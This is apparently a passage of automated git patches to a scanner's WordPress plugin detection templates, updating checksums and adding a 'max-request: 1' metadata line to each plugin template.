+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
-http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7206,7 +7207,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:4f3360c7f2951ae3deaa88df7b8f521132ae1293
+templates-checksum.txt:1bff714e6bb605fbfbe4fe21dc926828956c1381
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From f8794112ab27d097ae246d39b7518e7fb6256c49 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 2 Oct 2023 08:23:48 +0000
Subject: [PATCH 0649/1090] TemplateMan Update [Mon Oct  2 08:23:48 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
